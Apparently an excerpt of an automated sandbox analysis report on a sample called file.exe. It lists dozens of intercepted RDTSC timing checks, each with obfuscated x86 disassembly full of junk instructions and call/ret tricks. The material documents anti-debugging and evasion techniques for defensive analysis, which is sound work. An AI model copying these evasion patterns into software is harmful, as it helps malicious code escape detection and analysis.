                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8FA22 second address: F8FA44 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F230C515285h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8FA44 second address: F8FA55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F230C5197A6h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push esi 0x0000000f pop esi 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F93317 second address: F9331B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9331B second address: F9331F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9331F second address: F9332D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F230C515276h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9332D second address: F9336A instructions: 0x00000000 rdtsc 0x00000002 jg 00007F230C5197A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b xor dword ptr [esp], 258A746Eh 0x00000012 mov dx, ax 0x00000015 push 00000003h 0x00000017 push 00000000h 0x00000019 mov edx, esi 0x0000001b push 00000003h 0x0000001d call 00007F230C5197A9h 0x00000022 pushad 0x00000023 jmp 00007F230C5197B2h 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b pop eax 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9336A second address: F93380 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C51527Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F93380 second address: F93399 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C5197B5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F93399 second address: F93423 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jo 00007F230C515280h 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 jbe 00007F230C515276h 0x0000001d popad 0x0000001e mov eax, dword ptr [eax] 0x00000020 jmp 00007F230C515285h 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 push eax 0x0000002a jp 00007F230C515278h 0x00000030 push ecx 0x00000031 pop ecx 0x00000032 pop eax 0x00000033 pop eax 0x00000034 mov edx, dword ptr [ebp+122D37AAh] 0x0000003a lea ebx, dword ptr [ebp+124451E2h] 0x00000040 push 00000000h 0x00000042 push ebx 0x00000043 call 00007F230C515278h 0x00000048 pop ebx 0x00000049 mov dword ptr [esp+04h], ebx 0x0000004d add dword ptr [esp+04h], 00000014h 0x00000055 inc ebx 0x00000056 push ebx 0x00000057 ret 0x00000058 pop ebx 0x00000059 ret 0x0000005a jmp 00007F230C515289h 0x0000005f push eax 0x00000060 pushad 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F93423 second address: F9342B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F935CA second address: F935CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F936D7 second address: F936E1 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F230C5197A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB339F second address: FB33AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F230C515276h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB33AE second address: FB33B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB33B2 second address: FB33F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C515285h 0x00000007 jmp 00007F230C515287h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007F230C51527Bh 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB33F1 second address: FB33F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB10F9 second address: FB1131 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F230C515276h 0x0000000a popad 0x0000000b jmp 00007F230C515283h 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 js 00007F230C515287h 0x00000019 jmp 00007F230C515281h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB1131 second address: FB113A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB113A second address: FB1143 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB1143 second address: FB1149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB127B second address: FB1285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB1285 second address: FB128F instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F230C5197A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB128F second address: FB1295 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB1295 second address: FB12BB instructions: 0x00000000 rdtsc 0x00000002 ja 00007F230C5197AEh 0x00000008 pushad 0x00000009 popad 0x0000000a jno 00007F230C5197A6h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F230C5197B4h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB12BB second address: FB12DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C51527Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F230C51527Eh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB16E5 second address: FB1725 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C5197ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F230C5197B6h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F230C5197B8h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB1725 second address: FB1738 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C51527Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB1D20 second address: FB1D38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C5197B1h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB1FDF second address: FB1FEF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jc 00007F230C515276h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB1FEF second address: FB2009 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C5197ADh 0x00000007 jns 00007F230C5197A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB2009 second address: FB2025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F230C515282h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB2191 second address: FB2195 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB2195 second address: FB219B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB22BB second address: FB22D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F230C5197ABh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB22D1 second address: FB22D7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB22D7 second address: FB2302 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C5197B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b jmp 00007F230C5197B1h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA644C second address: FA645B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 jnl 00007F230C515276h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB2A94 second address: FB2ABA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jns 00007F230C5197A6h 0x0000000d jmp 00007F230C5197B9h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB2ABA second address: FB2ABE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB2ABE second address: FB2AC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB2C1C second address: FB2C24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB2C24 second address: FB2C30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push ebx 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB31E8 second address: FB3230 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jno 00007F230C51528Bh 0x0000000d jo 00007F230C515290h 0x00000013 jmp 00007F230C515288h 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB3230 second address: FB325C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007F230C5197A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jbe 00007F230C5197BDh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB325C second address: FB3262 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB3262 second address: FB3266 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBA023 second address: FBA02A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBA2C5 second address: FBA2DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F230C5197B4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBA2DD second address: FBA2FD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F230C515284h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBA2FD second address: FBA323 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C5197B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F230C5197ACh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBA323 second address: FBA32D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F230C51527Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBEA7A second address: FBEA91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F230C5197B3h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBEA91 second address: FBEA9E instructions: 0x00000000 rdtsc 0x00000002 jne 00007F230C515276h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBEA9E second address: FBEAB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F230C5197AEh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBE188 second address: FBE1BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C515281h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jc 00007F230C515276h 0x00000012 jmp 00007F230C515285h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBE300 second address: FBE315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F230C5197AFh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBE315 second address: FBE334 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F230C51527Ch 0x0000000b jbe 00007F230C515276h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBE600 second address: FBE606 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC1F60 second address: FC1F69 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC1F69 second address: FC1FBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 add dword ptr [esp], 5454921Bh 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F230C5197A8h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 jmp 00007F230C5197ADh 0x0000002c call 00007F230C5197A9h 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F230C5197AFh 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC1FBD second address: FC1FC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC2442 second address: FC2460 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F230C5197B9h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC2C0F second address: FC2C22 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 ja 00007F230C515276h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC2C22 second address: FC2C30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jg 00007F230C5197A6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC2CC5 second address: FC2CED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C515283h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jno 00007F230C515276h 0x00000010 push eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jnp 00007F230C515276h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC2DE6 second address: FC2DEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC5099 second address: FC509F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC509F second address: FC50F5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F230C5197B4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c je 00007F230C5197A6h 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F230C5197B5h 0x00000019 popad 0x0000001a pop esi 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F230C5197ABh 0x00000022 jmp 00007F230C5197AFh 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC69D1 second address: FC69E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b je 00007F230C515276h 0x00000011 pop ecx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC69E3 second address: FC69E8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC759B second address: FC759F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC759F second address: FC75A9 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F230C5197A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC8032 second address: FC803A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC8B25 second address: FC8B29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC8B29 second address: FC8B2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCA133 second address: FCA179 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C5197B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c xor di, 1B89h 0x00000011 mov si, cx 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 mov dword ptr [ebp+122D1AA0h], esi 0x0000001e xchg eax, ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 jmp 00007F230C5197B1h 0x00000027 jc 00007F230C5197A6h 0x0000002d popad 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCC99B second address: FCC9A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC9ECA second address: FC9ECE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCC9A1 second address: FCC9A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC9ECE second address: FC9ED4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCC9A5 second address: FCC9C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C515287h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCC9C7 second address: FCCA2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F230C5197ABh 0x00000009 popad 0x0000000a pop eax 0x0000000b nop 0x0000000c and ebx, 333FAA36h 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007F230C5197A8h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 00000014h 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e mov bx, 392Dh 0x00000032 add dword ptr [ebp+1245DC02h], ecx 0x00000038 push 00000000h 0x0000003a xchg eax, esi 0x0000003b push eax 0x0000003c push edx 0x0000003d js 00007F230C5197BEh 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1004631 second address: 1004635 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1004635 second address: 1004651 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C515280h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1004A43 second address: 1004A6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jne 00007F230C5197A6h 0x0000000c jl 00007F230C5197A6h 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 pop eax 0x00000016 jmp 00007F230C5197B5h 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1004A6F second address: 1004A75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1004A75 second address: 1004A79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1004BCE second address: 1004BD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1004BD2 second address: 1004BF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F230C5197ABh 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
